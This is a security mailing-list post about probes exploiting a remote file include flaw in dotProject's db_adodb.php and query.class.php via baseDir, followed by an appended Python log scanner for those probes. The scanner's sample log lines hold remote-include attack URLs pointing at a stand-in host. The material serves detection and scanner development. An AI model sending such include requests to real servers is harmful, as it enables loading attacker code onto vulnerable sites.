dotproject_file_includes.nasl
We have seen probes to a web server trying to exploit the remote file
include vulnerability in db_adodb.php. The URLs that are being tried are:
/db_adodb.php
/dotproject/includes/db_adodb.php
/includes/db_adodb.php
/project/includes/db_adodb.php
/projects/includes/db_adodb.php
I don't know if these are all valid locations for db_adodb.php. But, it looks
like dotproject_file_includes.nasl doesn't try the first of these URLs.
These probes also try an identical remote file include (using baseDir)
against another php routine - query.class.php. The specific URLs tried are:
/classes/query.class.php
/dotproject/classes/query.class.php
/proj/classes/query.class.php
/project/classes/query.class.php
There isn't a plugin that checks for query.class.php. This vulnerability is
documented as Bugtraq ID: 19547. Should the check for this php routine be
added to dotproject_file_includes.nasl or should it be a separate plugin?
_______________________________________________
Plugins-writers mailing list
Plugins-writers@list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers
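
One way to find the probes described in the post above in a web server access log, given as an added example that is not part of the original message or of any Nessus plugin. It assumes Apache common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts and parameter named in the post; the parameter is matched case-insensitively.
TARGET_SCRIPTS = ("db_adodb.php", "query.class.php")
PARAM = "basedir"
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# Assumption: Apache common/combined log format.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')

def classify(line):
    """Return (client, path, verdict) if the line touches a target script, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)
    if path.rsplit("/", 1)[-1].lower() not in TARGET_SCRIPTS:
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if key.lower() == PARAM and REMOTE_SCHEME.match(unquote(value)):
            # A 200 means the server served that path, so triage it first.
            return (client, path, "probe-served" if status == "200" else "probe")
    return (client, path, "direct-access")

def scan(lines):
    """Classify every line and keep only those that reference a target script."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation addresses and hostnames, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /db_adodb.php?baseDir=http://files.example/a.txt HTTP/1.1" 404 208',
    '192.0.2.10 - - [01/Jan/2007:10:00:01 +0000] "GET /dotproject/classes/query.class.php?baseDir=http%253A%252F%252Ffiles.example%252Fa.txt HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2007:10:05:00 +0000] "GET /includes/db_adodb.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2007:10:05:02 +0000] "GET /index.php?m=projects HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, path, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:14} {client:15} {path}")
```

A "probe-served" result shows which of the guessed paths actually exists on the server, and "direct-access" flags requests to these include files that carry no remote baseDir value but still should not be reachable from the web.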